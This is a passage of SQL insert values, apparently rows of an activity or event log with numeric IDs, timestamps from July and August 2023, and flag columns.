(5630, '2023-07-17 05:34:46', 1, 2054, 0, 1, 1),
(5631, '2023-07-17 12:29:24', 1, 2062, 0, 1, 1),
(5632, '2023-07-17 15:19:38', 4, 2061, 963, 1, 1),
(5633, '2023-07-17 16:48:54', 1, 2063, 0, 1, 1),
(5634, '2023-07-17 21:40:15', 1, 2060, 0, 1, 1),
(5635, '2023-07-18 09:42:34', 1, 2061, 0, 1, 1),
(5636, '2023-07-18 09:44:29', 1, 2063, 0, 1, 1),
(5637, '2023-07-18 09:44:41', 1, 2058, 0, 1, 1),
(5638, '2023-07-18 09:47:59', 1, 2062, 0, 1, 1),
(5639, '2023-07-18 09:58:16', 1, 2059, 0, 1, 1),
(5640, '2023-07-18 10:06:41', 1, 2055, 0, 1, 1),
(5641, '2023-07-18 10:24:23', 1, 2063, 0, 1, 1),
(5642, '2023-07-18 10:31:17', 1, 2059, 0, 1, 1),
(5643, '2023-07-18 10:34:19', 1, 2061, 0, 1, 1),
(5644, '2023-07-18 10:35:36', 1, 2054, 0, 1, 1),
(5645, '2023-07-18 10:42:44', 1, 2054, 0, 1, 1),
(5646, '2023-07-18 10:46:59', 1, 2064, 0, 1, 1),
(5647, '2023-07-18 10:59:49', 1, 2060, 0, 1, 1),
(5648, '2023-07-18 11:10:08', 1, 2055, 0, 1, 1),
(5649, '2023-07-18 11:22:50', 1, 2064, 0, 1, 1),
(5650, '2023-07-18 11:26:56', 1, 2062, 0, 1, 1),
(5651, '2023-07-18 12:01:54', 1, 2055, 0, 1, 1),
(5652, '2023-07-18 12:08:27', 1, 2061, 0, 1, 1),
(5653, '2023-07-18 13:10:18', 1, 2062, 0, 1, 1),
(5654, '2023-07-18 14:01:34', 1, 2062, 0, 1, 1),
(5655, '2023-07-18 15:40:07', 1, 2062, 0, 1, 1),
(5656, '2023-07-18 17:19:09', 1, 2058, 0, 1, 1),
(5657, '2023-07-18 20:12:17', 1, 2058, 0, 1, 1),
(5658, '2023-07-18 21:09:34', 1, 2062, 0, 1, 1),
(5659, '2023-07-18 21:09:39', 1, 2062, 0, 1, 1),
(5660, '2023-07-18 22:28:12', 1, 2063, 0, 1, 1),
(5661, '2023-07-18 22:44:46', 1, 2061, 0, 1, 1),
(5662, '2023-07-19 02:42:42', 1, 2063, 0, 1, 1),
(5663, '2023-07-19 10:01:37', 1, 2064, 0, 1, 1),
(5664, '2023-07-19 12:26:22', 1, 2055, 0, 1, 1),
(5665, '2023-07-19 16:39:12', 1, 2062, 0, 1, 1),
(5666, '2023-07-20 02:53:09', 1, 2059, 0, 1, 1),
(5667, '2023-07-20 03:54:59', 1, 2062, 0, 1, 1),
(5668, '2023-07-20 06:03:28', 1, 2063, 0, 1, 1),
(5669, '2023-07-20 08:04:11', 1, 2060, 0, 1, 1),
(5670, '2023-07-20 09:18:05', 1, 2063, 0, 1, 1),
(5671, '2023-07-20 12:42:28', 1, 2062, 0, 1, 1),
(5672, '2023-07-20 13:46:44', 1, 2064, 0, 1, 1),
(5673, '2023-07-21 04:19:35', 1, 2060, 0, 1, 1),
(5674, '2023-07-21 10:45:50', 1, 2054, 0, 1, 1),
(5675, '2023-07-21 11:28:09', 1, 2060, 0, 1, 1),
(5676, '2023-07-21 12:14:36', 1, 2061, 0, 1, 1),
(5677, '2023-07-21 13:31:09', 1, 2059, 0, 1, 1),
(5678, '2023-07-21 14:31:17', 1, 2064, 0, 1, 1),
(5679, '2023-07-21 14:52:00', 1, 2063, 0, 1, 1),
(5680, '2023-07-21 14:52:02', 1, 2058, 0, 1, 1),
(5681, '2023-07-21 15:26:11', 1, 2062, 0, 1, 1),
(5682, '2023-07-21 16:45:49', 1, 2054, 0, 1, 1),
(5683, '2023-07-21 17:26:18', 1, 2060, 0, 1, 1),
(5684, '2023-07-21 18:10:45', 1, 2061, 0, 1, 1),
(5685, '2023-07-21 19:24:18', 1, 2059, 0, 1, 1),
(5686, '2023-07-21 20:21:51', 1, 2064, 0, 1, 1),
(5687, '2023-07-21 21:15:13', 1, 2062, 0, 1, 1),
(5688, '2023-07-21 22:36:53', 1, 2055, 0, 1, 1),
(5689, '2023-07-21 23:21:40', 1, 2062, 0, 1, 1),
(5690, '2023-07-21 23:40:08', 1, 2063, 0, 1, 1),
(5691, '2023-07-21 23:57:46', 1, 2058, 0, 1, 1),
(5692, '2023-07-22 02:18:00', 1, 2054, 0, 1, 1),
(5693, '2023-07-22 03:27:44', 1, 2060, 0, 1, 1),
(5694, '2023-07-22 04:41:34', 1, 2059, 0, 1, 1),
(5695, '2023-07-22 04:42:37', 1, 2061, 0, 1, 1),
(5696, '2023-07-22 06:38:13', 1, 2059, 0, 1, 1),
(5697, '2023-07-22 08:08:40', 1, 2064, 0, 1, 1),
(5698, '2023-07-22 09:28:40', 1, 2062, 0, 1, 1),
(5699, '2023-07-22 11:31:18', 1, 2055, 0, 1, 1),
(5700, '2023-07-22 13:07:39', 1, 2063, 0, 1, 1),
(5701, '2023-07-22 13:34:56', 1, 2058, 0, 1, 1),
(5702, '2023-07-22 19:11:07', 1, 2055, 0, 1, 1),
(5703, '2023-07-23 13:47:48', 1, 2054, 0, 1, 1),
(5704, '2023-07-23 16:31:49', 1, 2062, 0, 1, 1),
(5705, '2023-07-23 19:28:19', 1, 2064, 0, 1, 1),
(5706, '2023-07-24 01:37:06', 1, 2062, 0, 1, 1),
(5707, '2023-07-24 10:03:20', 1, 2061, 0, 1, 1),
(5708, '2023-07-24 11:32:49', 1, 2054, 0, 1, 1),
(5709, '2023-07-24 13:47:28', 1, 2061, 0, 1, 1),
(5710, '2023-07-24 21:29:35', 1, 2062, 0, 1, 1),
(5711, '2023-07-25 01:56:24', 1, 2055, 0, 1, 1),
(5712, '2023-07-25 03:48:32', 1, 2058, 0, 1, 1),
(5713, '2023-07-25 05:54:24', 1, 2064, 0, 1, 1),
(5714, '2023-07-25 08:00:49', 1, 2062, 0, 1, 1),
(5715, '2023-07-25 15:20:59', 1, 2059, 0, 1, 1),
(5716, '2023-07-25 15:41:26', 1, 2064, 0, 1, 1),
(5717, '2023-07-25 16:51:09', 1, 2061, 0, 1, 1),
(5718, '2023-07-25 16:51:11', 1, 2054, 0, 1, 1),
(5719, '2023-07-25 16:58:21', 1, 2059, 0, 1, 1),
(5720, '2023-07-26 00:04:08', 1, 2063, 0, 1, 1),
(5721, '2023-07-26 01:49:05', 1, 2062, 0, 1, 1),
(5722, '2023-07-26 08:04:29', 1, 2063, 0, 1, 1),
(5723, '2023-07-26 09:46:33', 1, 2064, 0, 1, 1),
(5724, '2023-07-26 16:24:15', 1, 2054, 0, 1, 1),
(5725, '2023-07-26 17:05:22', 1, 2060, 0, 1, 1),
(5726, '2023-07-26 17:50:41', 1, 2061, 0, 1, 1),
(5727, '2023-07-26 19:06:58', 1, 2059, 0, 1, 1),
(5728, '2023-07-26 20:08:06', 1, 2064, 0, 1, 1),
(5729, '2023-07-26 20:27:19', 1, 2062, 0, 1, 1),
(5730, '2023-07-26 20:44:24', 1, 2060, 0, 1, 1),
(5731, '2023-07-26 21:03:11', 1, 2062, 0, 1, 1),
(5732, '2023-07-26 21:46:32', 1, 2054, 0, 1, 1),
(5733, '2023-07-26 22:25:25', 1, 2060, 0, 1, 1),
(5734, '2023-07-26 23:08:28', 1, 2061, 0, 1, 1),
(5735, '2023-07-26 23:43:22', 1, 2064, 0, 1, 1),
(5736, '2023-07-27 00:22:30', 1, 2059, 0, 1, 1),
(5737, '2023-07-27 01:22:06', 1, 2064, 0, 1, 1),
(5738, '2023-07-27 02:24:33', 1, 2054, 0, 1, 1),
(5739, '2023-07-27 03:05:40', 1, 2060, 0, 1, 1),
(5740, '2023-07-27 03:42:06', 1, 2055, 0, 1, 1),
(5741, '2023-07-27 03:53:23', 1, 2061, 0, 1, 1),
(5742, '2023-07-27 05:28:29', 1, 2059, 0, 1, 1),
(5743, '2023-07-27 06:35:23', 1, 2064, 0, 1, 1),
(5744, '2023-07-27 06:55:06', 1, 2059, 0, 1, 1),
(5745, '2023-07-27 07:42:31', 1, 2062, 0, 1, 1),
(5746, '2023-07-27 08:45:20', 1, 2059, 0, 1, 1),
(5747, '2023-07-27 09:23:10', 1, 2055, 0, 1, 1),
(5748, '2023-07-27 10:36:24', 1, 2063, 0, 1, 1),
(5749, '2023-07-27 10:57:05', 1, 2058, 0, 1, 1),
(5750, '2023-07-27 20:28:30', 1, 2062, 0, 1, 1),
(5751, '2023-07-27 21:56:55', 1, 2054, 0, 1, 1),
(5752, '2023-07-27 22:38:15', 1, 2060, 0, 1, 1),
(5753, '2023-07-27 23:32:03', 1, 2061, 0, 1, 1),
(5754, '2023-07-28 01:00:36', 1, 2059, 0, 1, 1),
(5755, '2023-07-28 02:06:16', 1, 2064, 0, 1, 1),
(5756, '2023-07-28 03:02:32', 1, 2062, 0, 1, 1),
(5757, '2023-07-28 03:29:39', 1, 2059, 0, 1, 1),
(5758, '2023-07-28 04:29:41', 1, 2055, 0, 1, 1),
(5759, '2023-07-28 05:36:16', 1, 2063, 0, 1, 1),
(5760, '2023-07-28 05:54:42', 1, 2058, 0, 1, 1),
(5761, '2023-07-28 07:13:24', 1, 2062, 0, 1, 1),
(5762, '2023-07-28 15:45:59', 1, 2055, 0, 1, 1),
(5763, '2023-07-28 16:09:12', 1, 2054, 0, 1, 1),
(5764, '2023-07-28 16:34:09', 1, 2062, 0, 1, 1),
(5765, '2023-07-28 16:51:03', 1, 2060, 0, 1, 1),
(5766, '2023-07-28 17:36:47', 1, 2061, 0, 1, 1),
(5767, '2023-07-28 18:58:02', 1, 2054, 0, 1, 1),
(5768, '2023-07-28 20:04:20', 1, 2054, 0, 1, 1),
(5769, '2023-07-28 20:21:58', 1, 2053, 0, 1, 1),
(5770, '2023-07-28 20:49:00', 1, 2061, 0, 1, 1),
(5771, '2023-07-28 21:08:41', 1, 2058, 0, 1, 1),
(5772, '2023-07-28 21:12:20', 1, 2054, 0, 1, 1),
(5773, '2023-07-28 21:47:45', 1, 2054, 0, 1, 1),
(5774, '2023-07-28 21:58:05', 1, 2060, 0, 1, 1),
(5775, '2023-07-28 22:37:42', 1, 2054, 0, 1, 1),
(5776, '2023-07-28 23:18:00', 1, 2060, 0, 1, 1),
(5777, '2023-07-29 00:00:23', 1, 2055, 0, 1, 1),
(5778, '2023-07-29 00:02:50', 1, 2061, 0, 1, 1),
(5779, '2023-07-29 01:20:12', 1, 2059, 0, 1, 1),
(5780, '2023-07-29 01:34:56', 1, 2054, 0, 1, 1),
(5781, '2023-07-29 01:34:57', 1, 2055, 0, 1, 1),
(5782, '2023-07-29 01:35:01', 1, 2064, 0, 1, 1),
(5783, '2023-07-29 01:35:03', 1, 2063, 0, 1, 1),
(5784, '2023-07-29 01:35:03', 1, 2062, 0, 1, 1),
(5785, '2023-07-29 01:35:04', 1, 2060, 0, 1, 1),
(5786, '2023-07-29 01:35:06', 1, 2059, 0, 1, 1),
(5787, '2023-07-29 01:35:07', 1, 2061, 0, 1, 1),
(5788, '2023-07-29 01:35:08', 1, 2058, 0, 1, 1),
(5789, '2023-07-29 01:59:09', 1, 2064, 0, 1, 1),
(5790, '2023-07-29 02:22:41', 1, 2064, 0, 1, 1),
(5791, '2023-07-29 02:37:30', 1, 2064, 0, 1, 1),
(5792, '2023-07-29 03:17:40', 1, 2062, 0, 1, 1),
(5793, '2023-07-29 04:12:33', 1, 2054, 0, 1, 1),
(5794, '2023-07-29 04:14:15', 1, 2059, 0, 1, 1),
(5795, '2023-07-29 04:43:24', 1, 2055, 0, 1, 1),
(5796, '2023-07-29 05:48:44', 1, 2063, 0, 1, 1),
(5797, '2023-07-29 05:51:30', 1, 2063, 0, 1, 1),
(5798, '2023-07-29 06:07:04', 1, 2058, 0, 1, 1),
(5799, '2023-07-29 07:41:18', 1, 2061, 0, 1, 1),
(5800, '2023-07-29 07:41:25', 1, 2054, 0, 1, 1),
(5801, '2023-07-29 09:38:43', 1, 2060, 0, 1, 1),
(5802, '2023-07-29 12:28:25', 1, 2062, 0, 1, 1),
(5803, '2023-07-29 18:12:15', 1, 2063, 0, 1, 1),
(5804, '2023-07-29 19:26:00', 1, 2061, 0, 1, 1),
(5805, '2023-07-29 20:10:27', 1, 2055, 0, 1, 1),
(5806, '2023-07-30 08:32:00', 1, 2058, 0, 1, 1),
(5807, '2023-07-30 10:51:48', 1, 2054, 0, 1, 1),
(5808, '2023-07-30 12:00:06', 1, 2062, 0, 1, 1),
(5809, '2023-07-30 12:45:02', 1, 2063, 0, 1, 1),
(5810, '2023-07-30 14:46:02', 1, 2058, 0, 1, 1),
(5811, '2023-07-30 17:12:58', 1, 2061, 0, 1, 1),
(5812, '2023-07-30 17:59:06', 1, 2064, 0, 1, 1),
(5813, '2023-07-31 05:33:23', 1, 2064, 0, 1, 1),
(5814, '2023-07-31 06:59:20', 1, 2064, 0, 1, 1),
(5815, '2023-07-31 09:17:40', 1, 2063, 0, 1, 1),
(5816, '2023-07-31 09:40:42', 1, 2054, 0, 1, 1),
(5817, '2023-07-31 11:12:17', 1, 2063, 0, 1, 1),
(5818, '2023-07-31 11:12:18', 1, 2063, 0, 1, 1),
(5819, '2023-07-31 16:51:18', 1, 2064, 0, 1, 1),
(5820, '2023-07-31 18:40:02', 1, 2061, 0, 1, 1),
(5821, '2023-07-31 19:31:32', 1, 2064, 0, 1, 1),
(5822, '2023-07-31 19:48:57', 1, 2062, 0, 1, 1),
(5823, '2023-07-31 22:14:55', 1, 2054, 0, 1, 1),
(5824, '2023-07-31 22:14:55', 1, 2053, 0, 1, 1),
(5825, '2023-07-31 22:14:59', 1, 2055, 0, 1, 1),
(5826, '2023-07-31 22:15:54', 1, 2064, 0, 1, 1),
(5827, '2023-07-31 22:16:10', 1, 2063, 0, 1, 1),
(5828, '2023-07-31 22:16:21', 1, 2062, 0, 1, 1),
(5829, '2023-07-31 22:16:27', 1, 2060, 0, 1, 1),
(5830, '2023-07-31 22:16:39', 1, 2059, 0, 1, 1),
(5831, '2023-07-31 22:16:44', 1, 2061, 0, 1, 1),
(5832, '2023-07-31 22:16:52', 1, 2058, 0, 1, 1),
(5833, '2023-07-31 23:31:07', 1, 2058, 0, 1, 1),
(5834, '2023-08-01 09:18:06', 1, 2054, 0, 1, 1),
(5835, '2023-08-01 18:14:27', 1, 2054, 0, 1, 1),
(5836, '2023-08-01 18:55:54', 1, 2060, 0, 1, 1),
(5837, '2023-08-01 19:41:35', 1, 2061, 0, 1, 1),
(5838, '2023-08-01 20:59:39', 1, 2059, 0, 1, 1),
(5839, '2023-08-01 21:38:44', 1, 2060, 0, 1, 1),
(5840, '2023-08-01 21:51:58', 1, 2054, 0, 1, 1),
(5841, '2023-08-01 22:32:04', 1, 2060, 0, 1, 1),
(5842, '2023-08-01 23:16:16', 1, 2061, 0, 1, 1),
(5843, '2023-08-02 00:32:19', 1, 2059, 0, 1, 1),
(5844, '2023-08-02 00:55:30', 1, 2058, 0, 1, 1),
(5845, '2023-08-02 01:33:42', 1, 2064, 0, 1, 1),
(5846, '2023-08-02 02:31:49', 1, 2062, 0, 1, 1),
(5847, '2023-08-02 03:53:41', 1, 2055, 0, 1, 1),
(5848, '2023-08-02 04:56:03', 1, 2063, 0, 1, 1),
(5849, '2023-08-02 05:13:22', 1, 2059, 0, 1, 1),
(5850, '2023-08-02 05:13:59', 1, 2058, 0, 1, 1),
(5851, '2023-08-02 06:28:46', 1, 2055, 0, 1, 1),
(5852, '2023-08-02 15:59:26', 1, 2058, 0, 1, 1),
(5853, '2023-08-02 20:52:11', 1, 2063, 0, 1, 1),
(5854, '2023-08-02 20:52:18', 1, 2063, 0, 1, 1),
(5855, '2023-08-03 00:49:17', 1, 2059, 0, 1, 1),
(5856, '2023-08-03 05:19:39', 1, 2055, 0, 1, 1),
(5857, '2023-08-03 06:49:43', 1, 2061, 0, 1, 1),
(5858, '2023-08-03 08:19:43', 1, 2061, 0, 1, 1),
(5859, '2023-08-03 08:47:46', 1, 2060, 0, 1, 1),
(5860, '2023-08-03 08:55:16', 1, 2060, 0, 1, 1),
(5861, '2023-08-03 10:53:28', 1, 2062, 0, 1, 1),
(5862, '2023-08-03 14:41:41', 1, 2054, 0, 1, 1),
(5863, '2023-08-03 14:41:45', 1, 2055, 0, 1, 1),
(5864, '2023-08-03 17:45:42', 1, 2063, 0, 1, 1),
(5865, '2023-08-04 00:30:08', 1, 2054, 0, 1, 1),
(5866, '2023-08-04 05:03:29', 1, 2063, 0, 1, 1),
(5867, '2023-08-04 05:03:52', 1, 2063, 0, 1, 1),
(5868, '2023-08-04 07:32:11', 1, 2059, 0, 1, 1),
(5869, '2023-08-04 16:00:16', 1, 2058, 0, 1, 1),
(5870, '2023-08-04 20:14:33', 1, 2064, 0, 1, 1),
(5871, '2023-08-05 00:46:13', 1, 2061, 0, 1, 1),
(5872, '2023-08-05 00:46:20', 4, 2061, 999, 1, 1),
(5873, '2023-08-05 00:47:27', 1, 2061, 0, 1, 1),
(5874, '2023-08-05 00:47:29', 4, 2061, 1000, 1, 1),
(5875, '2023-08-05 03:55:25', 1, 2064, 0, 1, 1),
(5876, '2023-08-05 06:47:12', 1, 2062, 0, 1, 1),
(5877, '2023-08-05 16:11:55', 1, 2064, 0, 1, 1),
(5878, '2023-08-05 16:41:54', 1, 2061, 0, 1, 1),
(5879, '2023-08-05 17:43:35', 1, 2064, 0, 1, 1),
(5880, '2023-08-05 18:27:28', 1, 2055, 0, 1, 1),
(5881, '2023-08-05 18:49:25', 1, 2063, 0, 1, 1),
(5882, '2023-08-05 20:22:47', 1, 2061, 0, 1, 1),
(5883, '2023-08-05 21:54:10', 1, 2055, 0, 1, 1),
(5884, '2023-08-05 22:13:00', 1, 2062, 0, 1, 1),
(5885, '2023-08-05 23:55:54', 1, 2064, 0, 1, 1),
(5886, '2023-08-06 00:29:17', 1, 2054, 0, 1, 1),
(5887, '2023-08-06 02:22:08', 1, 2063, 0, 1, 1),
(5888, '2023-08-06 03:41:54', 1, 2059, 0, 1, 1),
(5889, '2023-08-06 21:30:14', 1, 2059, 0, 1, 1),
(5890, '2023-08-06 21:55:01', 1, 2055, 0, 1, 1),
(5891, '2023-08-07 01:14:51', 1, 2058, 0, 1, 1),
(5892, '2023-08-07 01:53:38', 1, 2063, 0, 1, 1),
(5893, '2023-08-07 04:45:43', 1, 2059, 0, 1, 1),
(5894, '2023-08-07 04:55:36', 1, 2059, 0, 1, 1),
(5895, '2023-08-07 04:57:09', 1, 2060, 0, 1, 1),
(5896, '2023-08-07 04:57:15', 1, 2058, 0, 1, 1),
(5897, '2023-08-07 04:57:16', 1, 2062, 0, 1, 1),
(5898, '2023-08-07 04:57:19', 1, 2064, 0, 1, 1),
(5899, '2023-08-07 04:57:20', 1, 2059, 0, 1, 1),
(5900, '2023-08-07 04:57:22', 1, 2061, 0, 1, 1),
(5901, '2023-08-07 04:57:24', 1, 2055, 0, 1, 1),
(5902, '2023-08-07 04:57:25', 1, 2054, 0, 1, 1),
(5903, '2023-08-07 04:57:25', 1, 2063, 0, 1, 1),
(5904, '2023-08-07 08:04:56', 1, 2060, 0, 1, 1),
(5905, '2023-08-07 15:49:53', 1, 2060, 0, 1, 1),
(5906, '2023-08-08 00:30:32', 1, 2060, 0, 1, 1),
(5907, '2023-08-08 00:31:27', 1, 2054, 0, 1, 1),
(5908, '2023-08-08 00:32:22', 1, 2060, 0, 1, 1),
(5909, '2023-08-08 00:33:16', 1, 2058, 0, 1, 1),
(5910, '2023-08-08 00:34:12', 1, 2062, 0, 1, 1),
(5911, '2023-08-08 01:56:04', 1, 2060, 0, 1, 1),
(5912, '2023-08-08 07:15:15', 1, 2062, 0, 1, 1),
(5913, '2023-08-08 09:54:03', 1, 2059, 0, 1, 1),
(5914, '2023-08-08 10:25:40', 1, 2054, 0, 1, 1),
(5915, '2023-08-08 12:33:20', 1, 2059, 0, 1, 1),
(5916, '2023-08-08 15:14:41', 1, 2059, 0, 1, 1),
(5917, '2023-08-08 17:28:15', 1, 2055, 0, 1, 1),
(5918, '2023-08-08 20:24:40', 1, 2059, 0, 1, 1),
(5919, '2023-08-08 20:55:31', 1, 2053, 0, 1, 1),
(5920, '2023-08-08 20:55:41', 1, 2058, 0, 1, 1),
(5921, '2023-08-08 20:57:16', 1, 2054, 0, 1, 1),
(5922, '2023-08-08 21:00:05', 1, 2060, 0, 1, 1),
(5923, '2023-08-08 21:03:15', 1, 2063, 0, 1, 1),
(5924, '2023-08-08 21:06:36', 1, 2055, 0, 1, 1),
(5925, '2023-08-08 21:13:19', 1, 2063, 0, 1, 1),
(5926, '2023-08-08 21:13:47', 1, 2060, 0, 1, 1),
(5927, '2023-08-09 00:40:01', 1, 2053, 0, 1, 1),
(5928, '2023-08-09 00:40:10', 1, 2058, 0, 1, 1),
(5929, '2023-08-09 00:41:45', 1, 2054, 0, 1, 1),
(5930, '2023-08-09 03:05:09', 1, 2054, 0, 1, 1),
(5931, '2023-08-09 03:05:14', 1, 2055, 0, 1, 1),
(5932, '2023-08-09 05:19:56', 1, 2058, 0, 1, 1),
(5933, '2023-08-09 08:04:12', 1, 2062, 0, 1, 1),
(5934, '2023-08-09 14:19:50', 1, 2064, 0, 1, 1),
(5935, '2023-08-09 19:57:13', 1, 2061, 0, 1, 1),
(5936, '2023-08-09 19:57:15', 1, 2059, 0, 1, 1),
(5937, '2023-08-10 00:17:15', 1, 2059, 0, 1, 1),
(5938, '2023-08-10 00:17:16', 1, 2058, 0, 1, 1),
(5939, '2023-08-10 00:17:16', 1, 2055, 0, 1, 1),
(5940, '2023-08-10 00:17:16', 1, 2064, 0, 1, 1),
(5941, '2023-08-10 00:17:16', 1, 2061, 0, 1, 1),
(5942, '2023-08-10 00:17:16', 1, 2062, 0, 1, 1),
(5943, '2023-08-10 00:17:16', 1, 2060, 0, 1, 1),
(5944, '2023-08-10 00:17:16', 1, 2054, 0, 1, 1),
(5945, '2023-08-10 00:17:16', 1, 2063, 0, 1, 1),
(5946, '2023-08-10 00:52:24', 1, 2054, 0, 1, 1),
(5947, '2023-08-10 01:11:53', 1, 2064, 0, 1, 1),
(5948, '2023-08-10 02:32:36', 1, 2064, 0, 1, 1),
(5949, '2023-08-10 03:36:56', 1, 2053, 0, 1, 1),
(5950, '2023-08-10 03:37:12', 1, 2063, 0, 1, 1),
(5951, '2023-08-10 03:37:15', 1, 2062, 0, 1, 1),
(5952, '2023-08-10 03:37:17', 1, 2060, 0, 1, 1),
(5953, '2023-08-10 03:37:20', 1, 2059, 0, 1, 1),
(5954, '2023-08-10 03:53:11', 1, 2061, 0, 1, 1),
(5955, '2023-08-10 07:13:38', 1, 2063, 0, 1, 1),
(5956, '2023-08-10 08:30:03', 1, 2055, 0, 1, 1),
(5957, '2023-08-10 10:41:27', 1, 2064, 0, 1, 1),
(5958, '2023-08-10 13:21:03', 1, 2054, 0, 1, 1),
(5959, '2023-08-10 15:29:31', 1, 2058, 0, 1, 1),
(5960, '2023-08-10 16:38:07', 1, 2064, 0, 1, 1),
(5961, '2023-08-10 16:38:15', 1, 2062, 0, 1, 1),
(5962, '2023-08-10 17:41:51', 1, 2059, 0, 1, 1),
(5963, '2023-08-10 18:26:51', 1, 2062, 0, 1, 1),
(5964, '2023-08-10 20:11:51', 1, 2061, 0, 1, 1),
(5965, '2023-08-11 04:32:39', 1, 2058, 0, 1, 1),
(5966, '2023-08-11 06:19:26', 1, 2059, 0, 1, 1),
(5967, '2023-08-11 07:06:52', 1, 2055, 0, 1, 1),
(5968, '2023-08-11 07:07:48', 1, 2060, 0, 1, 1),
(5969, '2023-08-11 07:08:42', 1, 2054, 0, 1, 1),
(5970, '2023-08-11 07:09:38', 1, 2060, 0, 1, 1),
(5971, '2023-08-11 07:10:05', 1, 2063, 0, 1, 1),
(5972, '2023-08-11 07:10:57', 1, 2058, 0, 1, 1),
(5973, '2023-08-11 07:11:05', 1, 2062, 0, 1, 1),
(5974, '2023-08-11 10:53:30', 1, 2064, 0, 1, 1),
(5975, '2023-08-11 11:58:50', 1, 2058, 0, 1, 1),
(5976, '2023-08-11 11:58:59', 1, 2054, 0, 1, 1),
(5977, '2023-08-11 11:59:01', 1, 2064, 0, 1, 1),
(5978, '2023-08-11 11:59:10', 1, 2062, 0, 1, 1),
(5979, '2023-08-11 11:59:11', 1, 2060, 0, 1, 1),
(5980, '2023-08-11 11:59:15', 1, 2055, 0, 1, 1),
(5981, '2023-08-11 11:59:20', 1, 2059, 0, 1, 1),
(5982, '2023-08-11 11:59:22', 1, 2063, 0, 1, 1),
(5983, '2023-08-11 11:59:23', 1, 2061, 0, 1, 1),
(5984, '2023-08-11 11:59:44', 1, 2058, 0, 1, 1),
(5985, '2023-08-11 11:59:52', 1, 2054, 0, 1, 1),
(5986, '2023-08-11 11:59:54', 1, 2064, 0, 1, 1),
(5987, '2023-08-11 12:00:00', 1, 2062, 0, 1, 1),
(5988, '2023-08-11 12:00:02', 1, 2055, 0, 1, 1),
(5989, '2023-08-11 12:00:07', 1, 2059, 0, 1, 1),
(5990, '2023-08-11 12:00:09', 1, 2063, 0, 1, 1),
(5991, '2023-08-11 12:00:10', 1, 2061, 0, 1, 1),
(5992, '2023-08-11 12:00:15', 1, 2060, 0, 1, 1),
(5993, '2023-08-11 12:00:30', 1, 2053, 0, 1, 1),
(5994, '2023-08-11 14:51:32', 1, 2054, 0, 1, 1),
(5995, '2023-08-11 15:54:15', 1, 2063, 0, 1, 1),
(5996, '2023-08-11 17:49:27', 1, 2060, 0, 1, 1),
(5997, '2023-08-12 03:49:52', 1, 2058, 0, 1, 1),
(5998, '2023-08-12 08:40:43', 1, 2053, 1032, 1, 1),
(5999, '2023-08-12 08:40:48', 1, 2054, 1032, 1, 1),
(6000, '2023-08-12 08:40:53', 1, 2055, 1032, 1, 1),
(6001, '2023-08-12 08:40:57', 1, 2058, 1032, 1, 1),
(6002, '2023-08-12 08:41:03', 1, 2059, 1032, 1, 1),
(6003, '2023-08-12 08:41:07', 1, 2060, 1032, 1, 1),
(6004, '2023-08-12 08:41:12', 1, 2061, 1032, 1, 1),
(6005, '2023-08-12 08:41:16', 1, 2062, 1032, 1, 1),
(6006, '2023-08-12 08:41:21', 1, 2063, 1032, 1, 1),
(6007, '2023-08-12 08:41:25', 1, 2064, 1032, 1, 1),
(6008, '2023-08-12 09:01:07', 1, 2054, 75, 0, 1),
(6009, '2023-08-12 09:04:55', 1, 2060, 75, 0, 1),
(6010, '2023-08-12 09:04:56', 1, 2054, 75, 0, 1),
(6011, '2023-08-12 09:05:01', 1, 2054, 75, 0, 1),
(6012, '2023-08-12 09:08:41', 1, 2060, 75, 0, 1),
(6013, '2023-08-12 09:08:50', 1, 2060, 75, 0, 1),
(6014, '2023-08-12 09:31:46', 1, 2058, 0, 1, 1),
(6015, '2023-08-12 12:22:30', 1, 2060, 1033, 1, 1),
(6016, '2023-08-12 12:36:59', 1, 2055, 1033, 1, 1),
(6017, '2023-08-12 12:38:46', 1, 2055, 1033, 1, 1),
(6018, '2023-08-12 12:38:51', 1, 2055, 1033, 1, 1),
(6019, '2023-08-12 12:41:34', 1, 2053, 1033, 1, 1),
(6020, '2023-08-12 12:45:30', 1, 2064, 1033, 1, 1),
(6021, '2023-08-12 12:46:37', 1, 2064, 1033, 1, 1),
(6022, '2023-08-12 12:48:12', 1, 2063, 1033, 1, 1),
(6023, '2023-08-12 12:49:03', 1, 2062, 1033, 1, 1),
(6024, '2023-08-12 12:49:04', 1, 2064, 1033, 1, 1),
(6025, '2023-08-12 12:49:05', 1, 2063, 1033, 1, 1),
(6026, '2023-08-12 12:49:08', 1, 2064, 1033, 1, 1),
(6027, '2023-08-12 12:51:06', 1, 2059, 1033, 1, 1),
(6028, '2023-08-12 12:52:06', 1, 2061, 1033, 1, 1),
(6029, '2023-08-12 12:52:19', 1, 2062, 1033, 1, 1),
(6030, '2023-08-12 12:52:21', 1, 2058, 1033, 1, 1),
(6031, '2023-08-12 12:52:25', 1, 2062, 1033, 1, 1),
(6032, '2023-08-12 12:53:16', 1, 2063, 1033, 1, 1),
(6033, '2023-08-12 12:54:45', 1, 2059, 1033, 1, 1),
(6034, '2023-08-12 12:54:46', 1, 2063, 1033, 1, 1),
(6035, '2023-08-12 12:54:49', 1, 2059, 1033, 1, 1),
(6036, '2023-08-12 12:56:44', 1, 2058, 1033, 1, 1),
(6037, '2023-08-12 12:56:46', 1, 2061, 1033, 1, 1),
(6038, '2023-08-12 12:56:49', 1, 2058, 1033, 1, 1),
(6039, '2023-08-12 12:56:53', 1, 2061, 1033, 1, 1),
(6040, '2023-08-12 13:00:38', 1, 2053, 1033, 1, 1),
(6041, '2023-08-12 13:07:17', 1, 2053, 1033, 1, 1),
(6042, '2023-08-12 13:07:18', 1, 2053, 1033, 1, 1),
(6043, '2023-08-12 23:11:04', 1, 2055, 0, 1, 1),
(6044, '2023-08-13 10:48:23', 1, 2059, 0, 1, 1),
(6045, '2023-08-13 11:42:06', 4, 2061, 1035, 1, 1),
(6046, '2023-08-13 12:28:37', 4, 2061, 1036, 1, 1),
(6047, '2023-08-14 11:29:13', 1, 2060, 0, 1, 1),
(6048, '2023-08-14 12:02:44', 1, 2061, 0, 1, 1),
(6049, '2023-08-14 12:02:45', 1, 2062, 0, 1, 1),
(6050, '2023-08-14 12:02:46', 1, 2064, 0, 1, 1),
(6051, '2023-08-14 12:02:48', 1, 2063, 0, 1, 1),
(6052, '2023-08-14 12:02:52', 1, 2053, 0, 1, 1),
(6053, '2023-08-14 13:10:50', 1, 2061, 0, 1, 1),
(6054, '2023-08-14 13:10:54', 4, 2061, 1037, 1, 1),
(6055, '2023-08-14 15:34:58', 1, 2059, 0, 1, 1),
(6056, '2023-08-14 21:10:55', 1, 2053, 0, 1, 1),
